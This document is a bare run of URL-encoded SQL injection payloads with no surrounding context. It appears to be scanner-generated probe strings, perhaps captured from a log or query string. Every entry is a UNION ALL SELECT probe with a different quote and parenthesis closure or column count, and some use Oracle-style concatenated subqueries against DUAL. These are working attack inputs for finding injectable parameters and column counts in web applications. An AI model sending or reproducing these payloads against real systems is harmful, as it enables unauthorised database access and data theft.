-7835%22%29%29%29%20UNION%20ALL%20SELECT%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543%2C%209543--%20%20AND%20%28%28%28%22iUYB%22%20LIKE%20%22iUYB -3045%22%29%29%29%20UNION%20ALL%20SELECT%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304--%20%20AND%20%28%28%28%22azFN%22%20LIKE%20%22azFN -8207%22%20UNION%20ALL%20SELECT%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217%2C%209217--%20%20AND%20%22RfgN%22%20LIKE%20%22RfgN -1959%22%20UNION%20ALL%20SELECT%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228--%20%20AND%20%22xdVr%22%20LIKE%20%22xdVr -7995%22%20UNION%20ALL%20SELECT%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909--%20%20AND%20%22FPeT%22%20LIKE%20%22FPeT -5082%22%20UNION%20ALL%20SELECT%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821--%20%20AND%20%22ODxN%22%20LIKE%20%22ODxN -6387%22%20UNION%20ALL%20SELECT%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534--%20%20AND%20%22rCaj%22%20LIKE%20%22rCaj -8041%22%20UNION%20ALL%20SELECT%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326--%20%20AND%20%22zSNa%22%20LIKE%20%22zSNa -3400%22%20UNION%20ALL%20SELECT%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042--%20%20AND%20%22QuvC%22%20LIKE%20%22QuvC -6963%22%20UNION%20ALL%20SELECT%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653--%20%20AND%20%22ZxQE%22%20LIKE%20%22ZxQE -2747%22%20UNION%20ALL%20SELECT%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376%2C%202376--%20%20AND%20%22wyik%22%20LIKE%20%22wyik -2035%22%20UNION%20ALL%20SELECT%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914%2C%201914--%20%20AND%20%22uRcN%22%20LIKE%20%22uRcN -4642%29%20WHERE%202918%3D2918%20UNION%20ALL%20SELECT%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918--%20 -5834%29%20WHERE%202701%3D2701%20UNION%20ALL%20SELECT%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701--%20 -5212%29%20WHERE%203300%3D3300%20UNION%20ALL%20SELECT%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300--%20 -8325%29%20WHERE%201214%3D1214%20UNION%20ALL%20SELECT%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214%2C%201214--%20 -5746%29%20WHERE%205236%3D5236%20UNION%20ALL%20SELECT%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236--%20 -7850%29%20WHERE%205834%3D5834%20UNION%20ALL%20SELECT%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834--%20 -1530%29%20WHERE%207437%3D7437%20UNION%20ALL%20SELECT%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437%2C%207437--%20 -6963%29%20WHERE%204314%3D4314%20UNION%20ALL%20SELECT%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314%2C%204314--%20 -6596%29%20WHERE%209998%3D9998%20UNION%20ALL%20SELECT%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998--%20 -9737%29%20WHERE%206617%3D6617%20UNION%20ALL%20SELECT%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617--%20 -2003%27%29%20WHERE%201770%3D1770%20UNION%20ALL%20SELECT%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770%2C%201770--%20 -5793%27%29%20WHERE%202518%3D2518%20UNION%20ALL%20SELECT%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518--%20 -2272%27%29%20WHERE%208697%3D8697%20UNION%20ALL%20SELECT%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697--%20 -2901%27%29%20WHERE%209386%3D9386%20UNION%20ALL%20SELECT%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386--%20 -3747%27%29%20WHERE%204980%3D4980%20UNION%20ALL%20SELECT%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980%2C%204980--%20 -3451%27%29%20WHERE%204196%3D4196%20UNION%20ALL%20SELECT%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196--%20 -5044%27%29%20WHERE%207906%3D7906%20UNION%20ALL%20SELECT%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906%2C%207906--%20 -7811%27%29%20WHERE%204824%3D4824%20UNION%20ALL%20SELECT%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824%2C%204824--%20 -8427%27%29%20WHERE%203477%3D3477%20UNION%20ALL%20SELECT%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477--%20 -3129%27%29%20WHERE%201876%3D1876%20UNION%20ALL%20SELECT%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876--%20 -1159%27%20WHERE%207144%3D7144%20UNION%20ALL%20SELECT%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144--%20 -4268%27%20WHERE%209570%3D9570%20UNION%20ALL%20SELECT%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570--%20 -3544%27%20WHERE%209196%3D9196%20UNION%20ALL%20SELECT%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196%2C%209196--%20 -7095%27%20WHERE%203036%3D3036%20UNION%20ALL%20SELECT%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036--%20 -5346%27%20WHERE%204331%3D4331%20UNION%20ALL%20SELECT%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331%2C%204331--%20 -4167%27%20WHERE%201755%3D1755%20UNION%20ALL%20SELECT%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755--%20 -2006%27%20WHERE%201175%3D1175%20UNION%20ALL%20SELECT%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175%2C%201175--%20 -9035%27%20WHERE%201599%3D1599%20UNION%20ALL%20SELECT%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599--%20 -5484%27%20WHERE%202660%3D2660%20UNION%20ALL%20SELECT%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660--%20 -5352%27%20WHERE%205485%3D5485%20UNION%20ALL%20SELECT%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485--%20 -5842%22%20WHERE%206831%3D6831%20UNION%20ALL%20SELECT%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831--%20 -2135%22%20WHERE%201303%3D1303%20UNION%20ALL%20SELECT%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303--%20 -6470%22%20WHERE%207986%3D7986%20UNION%20ALL%20SELECT%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986--%20 -1073%22%20WHERE%201700%3D1700%20UNION%20ALL%20SELECT%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700--%20 -3933%22%20WHERE%205485%3D5485%20UNION%20ALL%20SELECT%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485--%20 -2146%22%20WHERE%202740%3D2740%20UNION%20ALL%20SELECT%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740%2C%202740--%20 -7861%22%20WHERE%203899%3D3899%20UNION%20ALL%20SELECT%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899--%20 -7941%22%20WHERE%207922%3D7922%20UNION%20ALL%20SELECT%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922--%20 -5825%22%20WHERE%206414%3D6414%20UNION%20ALL%20SELECT%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414--%20 -4327%22%20WHERE%204933%3D4933%20UNION%20ALL%20SELECT%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933--%20 -9102%27%20%7C%7C%20%28SELECT%203239%20FROM%20DUAL%20WHERE%208648%3D8648%20UNION%20ALL%20SELECT%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648--%20%20%29%20%7C%7C%20%27 -4060%27%20%7C%7C%20%28SELECT%203041%20FROM%20DUAL%20WHERE%203349%3D3349%20UNION%20ALL%20SELECT%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349--%20%20%29%20%7C%7C%20%27 -5166%27%20%7C%7C%20%28SELECT%209441%20FROM%20DUAL%20WHERE%206243%3D6243%20UNION%20ALL%20SELECT%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243%2C%206243--%20%20%29%20%7C%7C%20%27 -8185%27%20%7C%7C%20%28SELECT%204843%20FROM%20DUAL%20WHERE%205044%3D5044%20UNION%20ALL%20SELECT%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044--%20%20%29%20%7C%7C%20%27 -4006%27%20%7C%7C%20%28SELECT%205141%20FROM%20DUAL%20WHERE%207606%3D7606%20UNION%20ALL%20SELECT%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606--%20%20%29%20%7C%7C%20%27 -3775%27%20%7C%7C%20%28SELECT%206685%20FROM%20DUAL%20WHERE%206327%3D6327%20UNION%20ALL%20SELECT%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327%2C%206327--%20%20%29%20%7C%7C%20%27 